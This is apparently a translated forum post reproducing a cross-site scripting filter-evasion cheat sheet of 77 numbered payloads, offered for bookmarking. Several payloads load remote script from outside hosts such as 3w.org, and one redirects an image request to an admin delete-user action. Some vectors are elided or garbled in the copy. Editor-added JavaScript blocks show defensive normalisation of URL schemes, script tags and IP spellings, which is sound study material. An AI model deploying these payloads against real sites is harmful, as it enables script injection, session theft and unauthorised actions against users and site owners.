It seems t00ls has relatively little material on XSS; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a javascript: directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities (the semicolons are required here)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (see the XSS Calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (XSS Calculator)
<IMG SRC=jav..omitted..S')>

(9) Long (7-digit) UTF-8 Unicode encoding without semicolons (XSS Calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (XSS Calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the word javascript (the whitespace inside the vector is a literal TAB character)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the word javascript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript using carriage returns, the extreme form of the above (in the original every character of the vector sits on its own line; this copy shows it collapsed onto one line)
<IMG SRC="javascript:alert('XSS')">
(16) Evading a length limit on the input (all the fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character (written to a file with Perl, because a NUL byte cannot be typed directly)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective on domestic sites, as there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">
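Vectors (3) through (14), (17) and (19) all defeat a filter that compares the raw attribute value against the string "javascript:". The block below is an added example by the editor, not part of the original post or of the cheat sheet it copies. It shows the normalisation a browser applies before it sees the scheme (entity decoding, then removal of the control characters the URL parser ignores) and a scheme check built on top of it. All function names and the sample values are the editor's own; `&Tab;` and `&NewLine;` are HTML5 named references not on the page, included because they decode to characters the parser strips.

```javascript
// Added example (editor's own, not from the original post or the XSS cheat sheet).
// Normalise a URL-valued attribute the way a permissive browser does before
// deciding which scheme it carries, so that case changes, HTML entities, embedded
// tabs/newlines and NUL bytes no longer hide "javascript:" from a filter.

// Named references relevant to URL attributes. Tab and NewLine are HTML5 names not
// used on the page; they are included because they decode to stripped characters.
const NAMED_REFS = { quot: '"', apos: "'", amp: '&', lt: '<', gt: '>', Tab: '\t', NewLine: '\n' };

// Decode numeric references (decimal or hex, semicolon optional, leading zeros
// allowed, as in vectors 8-10) and the named references above. Unknown names are
// left as they are.
function decodeEntities(s) {
  return s.replace(/&(?:#[xX]([0-9a-fA-F]+)|#([0-9]+)|([A-Za-z]+));?/g, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : m;
  });
}

// The WHATWG URL parser removes tab, LF and CR anywhere in the input and trims
// leading/trailing C0 controls and spaces; legacy IE also ignored NUL bytes inside
// the scheme (vector 17). A detector should assume the most permissive parser it
// may face, so every C0 control and space is removed. The cost is that a value such
// as "java script:" is also flagged, which is a harmless false positive.
function normaliseUrlValue(attrValue) {
  return decodeEntities(attrValue).replace(/[\x00-\x20]/g, '').toLowerCase();
}

// The scheme a browser would see, or null when the value is a relative URL.
function urlScheme(attrValue) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normaliseUrlValue(attrValue));
  return m ? m[1] : null;
}

// Schemes used by the vectors on this page. A denylist like this is never complete,
// which is why safeHref below allowlists instead.
const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript']);

function isScriptUrl(attrValue) {
  return SCRIPT_SCHEMES.has(urlScheme(attrValue));
}

// Allowlist version: keep relative URLs and a few known-safe schemes, neutralise
// everything else. A scheme-relative "//host/..." counts as relative here and
// inherits the page's own scheme (vector 25).
function safeHref(attrValue, allowed = ['http', 'https', 'mailto']) {
  const scheme = urlScheme(attrValue);
  if (scheme === null) return attrValue;
  return allowed.includes(scheme) ? attrValue : 'about:blank';
}

// Constructed samples mirroring the page's vectors; the hex and no-semicolon
// decimal forms are written out in full here because the page elides them.
const SAMPLE_VALUES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  'javascript:alert(&quot;XSS&quot;)',
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)',
  '&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert(1)',
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x31&#x29',
  "jav\tascript:alert('XSS');",
  "jav&#x09;ascript:alert('XSS');",
  "jav&#x0A;ascript:alert('XSS');",
  "jav&#x0D;ascript:alert('XSS');",
  'java\u0000script:alert("XSS")',
  " &#14;  javascript:alert('XSS');",
  'vbscript:msgbox("XSS")',
  'http://3w.org/XSS/xss.js',
  '//3w.org/XSS/xss.js',
];

// The sample values that a naive substring check for "javascript:" misses but the
// normalising check catches.
function missedByNaiveFilter(values = SAMPLE_VALUES) {
  return values.filter((v) => isScriptUrl(v) && !v.includes('javascript:'));
}
```

Run `missedByNaiveFilter()` to see that ten of the fifteen samples slip past the substring check while `urlScheme` resolves every one of them to `javascript` or `vbscript`. The practical takeaway is the shape of `safeHref`: decide on the normalised scheme and allow a short list, rather than trying to enumerate the spellings of the bad ones.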
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2, with a protocol-relative URL
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS vector
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (needs neither a javascript: URL nor a <SCRIPT tag)
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image plus extra characters: any of the characters with decimal codes 1-32, 34, 39, 160, 8192-8.13, 12288 or 65279 may be inserted between the opening parenthesis and javascript: (this copy shows only the plain form)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression broken up by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (in IE any tag made of an open angle bracket and a letter works)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of this vector survived the copy; the idea is to break the word expression apart with CSS comments)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash movie that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash movie can smuggle in your XSS code (the eval here is ActionScript)
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload.
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, put the JS code inside an image file and load that as the script source (the SRC value was lost in this copy)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands: the image request is sent with the victim's session cookies, so it can trigger a state-changing action on a site the victim is logged into (a CSRF effect; it does not execute arbitrary commands)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands 2 (a.jpg on the same server): an Apache Redirect rule that sends a request for the innocuous-looking image on to the action above
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing filters with HTML quote encapsulation. The vectors in (61)-(67) put quoted junk between the tag name and SRC so that a naive pattern for "<SCRIPT SRC" does not match.
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
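Vectors (61) through (67) work against a filter that looks for "<script ... src" with a regular expression and does not understand attribute quoting. The block below is an added example by the editor, not code from the original post. The regex `NAIVE_SCRIPT_SRC` is the editor's reconstruction of that kind of check, not a filter quoted by the page; `scriptSrcs()` re-reads the same markup with a quote-aware attribute tokenizer that follows the attribute states of the HTML5 tokenizer, and `audit()` compares the two. Function names and the `VECTORS` table are the editor's own.

```javascript
// Added example (editor's own, not from the original post). A regex filter for
// "<script ... src" compared with a quote-aware tokenizer over vectors 61-67.

// The kind of check these vectors defeat (editor's assumption about the filter).
const NAIVE_SCRIPT_SRC = /<script[^>]+src/i;

const isWs = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';

// Parse the attributes of a start tag beginning at index i (just after the tag
// name). Returns lower-cased attribute names mapped to values; the first of any
// duplicate wins, as in HTML. Quoted values may contain ">" (vectors 61, 63, 64, 66);
// a backtick is not a quote character in HTML5 (vector 65 relied on old IE).
function parseAttributes(html, i) {
  const attrs = {};
  while (i < html.length) {
    while (i < html.length && (isWs(html[i]) || html[i] === '/')) i++;   // before attribute name
    if (i >= html.length || html[i] === '>') break;
    let name = '';
    // A leading "=" becomes part of the name (vector 62); otherwise "=" ends it.
    while (i < html.length && !isWs(html[i]) && html[i] !== '/' && html[i] !== '>' &&
           !(html[i] === '=' && name !== '')) {
      name += html[i++];
    }
    while (i < html.length && isWs(html[i])) i++;                        // after attribute name
    let value = '';
    if (html[i] === '=') {
      i++;
      while (i < html.length && isWs(html[i])) i++;                      // before attribute value
      const q = html[i];
      if (q === '"' || q === "'") {
        const end = html.indexOf(q, i + 1);
        value = end === -1 ? html.slice(i + 1) : html.slice(i + 1, end);
        i = end === -1 ? html.length : end + 1;
      } else {
        while (i < html.length && !isWs(html[i]) && html[i] !== '>') value += html[i++];
      }
    }
    const key = name.toLowerCase();
    if (!Object.prototype.hasOwnProperty.call(attrs, key)) attrs[key] = value;
  }
  return attrs;
}

// Every src= value on a <script> start tag that the tokenizer actually sees.
function scriptSrcs(html) {
  const srcs = [];
  const tag = /<script(?=[\s/>])/gi;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const attrs = parseAttributes(html, m.index + m[0].length);
    if (Object.prototype.hasOwnProperty.call(attrs, 'src')) srcs.push(attrs.src);
  }
  return srcs;
}

// What the regex filter decides versus what the tokenizer finds.
function audit(html) {
  return { naiveBlocked: NAIVE_SCRIPT_SRC.test(html), srcs: scriptSrcs(html) };
}

// The page's vectors 61-67 with straight quotes, plus the plain form for comparison.
const VECTORS = {
  plain: '<SCRIPT SRC="http://3w.org/xss.js"></SCRIPT>',
  v61: '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
  v62: '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',
  v63: '<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>',
  v64: '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',
  v65: '<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>',
  v66: '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
  v67: '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>',
};
```

`audit()` returns `naiveBlocked: false` for all seven vectors, while the tokenizer recovers the external script for (61), (63), (64) and (66). Two caveats show up in the output. For (62) and (65) the HTML5 tokenizer ends the tag at the first unquoted ">" (the "=" starts an attribute name, and a backtick is not a quote), so those two are IE-era vectors that do not load a remote script in a current browser. For (67) no parser of the static markup can find the src at all, because the tag only exists once `document.write` has assembled it at runtime; that is the case that output filtering cannot solve and that output encoding or a Content-Security-Policy `script-src` has to cover.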
(68) URL string evasion: an IP address instead of the hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the percent-encoded form was lost in this copy)
<A HREF="http://3w.org">XSS</A>

(70) Dword (decimal) IP address (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) Hex IP address
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP address
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding, with tabs and newlines inside the URL (66.000146.0x7.147 resolves to 66.102.7.147)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting http: (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>

(75) Omitting www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
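Vectors (68) through (76) are different spellings of the same destination, written so that a filter comparing the raw URL string against a blocked host never sees the host it is looking for. The block below is an added example by the editor, not code from the original post. It canonicalises the host part of a URL the way the WHATWG URL parser does (tabs and newlines removed, numeric labels read as hex, octal or decimal, a single label treated as a 32-bit address, trailing dot dropped) so that every one of those spellings compares equal to the dotted-decimal or hostname form. Function names, the sample URLs and the denylist are the editor's own; in a WHATWG-conforming runtime `new URL(raw).hostname` yields the same canonical hosts.

```javascript
// Added example (editor's own, not from the original post). Canonicalise the host
// of a URL so that the IP and hostname spellings in vectors 68-76 compare equal.

// Parse one IPv4 label: "0x" prefix is hex, a leading "0" is octal, otherwise decimal.
function parseIPv4Number(label) {
  if (label === '') return null;
  let radix = 10;
  let digits = label;
  if (/^0[xX]/.test(digits)) { digits = digits.slice(2); radix = 16; }
  else if (digits.length > 1 && digits[0] === '0') { digits = digits.slice(1); radix = 8; }
  if (digits === '') return 0;                              // "0x" alone is zero
  const valid = { 10: /^[0-9]+$/, 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/ }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Up to four labels; the last one carries the remaining bytes, so a single label
// is a 32-bit "dword" address (vector 70). Returns dotted decimal or null when the
// host is not numeric.
function canonicalIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map(parseIPv4Number);
  if (nums.some((n) => n === null)) return null;
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let ip = last;
  for (let i = 0; i < nums.length - 1; i++) ip += nums[i] * 256 ** (3 - i);
  return [ip >>> 24, (ip >>> 16) & 255, (ip >>> 8) & 255, ip & 255].join('.');
}

// Host part of a raw URL string. Tab, LF and CR are removed anywhere, as the URL
// parser does (vector 73); userinfo and port are dropped; a scheme-relative
// "//host" (vector 74) is accepted. Returns null when there is no authority, which
// covers relative paths and javascript: links (vector 77).
function extractHost(raw) {
  const s = raw.replace(/[\t\n\r]/g, '').trim();
  const m = /^(?:[a-zA-Z][a-zA-Z0-9+.-]*:)?\/\/([^\/?#\\]*)/.exec(s);
  if (!m) return null;
  let host = m[1];
  const at = host.lastIndexOf('@');
  if (at !== -1) host = host.slice(at + 1);
  return host.replace(/:\d*$/, '').toLowerCase();   // IPv6 literals are not handled here
}

// Canonical host: lower-case, no trailing dot (vector 76), numeric forms folded to
// dotted decimal (vectors 70-73).
function normalizeHost(raw) {
  let host = extractHost(raw);
  if (host === null || host === '') return null;
  if (host.endsWith('.')) host = host.slice(0, -1);
  return canonicalIPv4(host) || host;
}

// The substring check the vectors were written against, and the check to use instead.
function naiveHostBlocked(raw, denylist) {
  return denylist.some((h) => raw.toLowerCase().includes(h));
}
function hostDisallowed(raw, denylist) {
  const host = normalizeHost(raw);
  return host !== null && denylist.includes(host);
}

// Constructed samples following vectors 68-77, and a constructed denylist.
const SAMPLE_URLS = [
  'http://127.0.0.1/',
  'http://3232235521',
  'http://0xc0.0xa8.0x00.0x01/',
  'http://0300.0250.0000.0001/',
  'h\ntt\tp://6\t6.000146.0x7.147/',
  '//www.google.com/',
  'http://google.com/',
  'http://www.google.com./',
  "javascript:document.location='http://www.google.com/'",
];
const DENYLIST = ['192.168.0.1', '66.102.7.147', 'www.google.com'];

// Sample URLs that reach a denylisted host while passing the substring check.
function evasions(denylist = DENYLIST, urls = SAMPLE_URLS) {
  return urls.filter((u) => hostDisallowed(u, denylist) && !naiveHostBlocked(u, denylist));
}
```

`evasions()` returns the four numeric spellings (dword, hex, octal and the tab-and-newline mix), each of which the substring check waves through and `normalizeHost` maps back to a denylisted address. Two of the samples make a different point: `http://google.com/` is simply a host the denylist forgot, which no normalisation fixes, and the javascript: link of vector (77) has no host at all, so a host check says nothing about it and the scheme has to be checked separately.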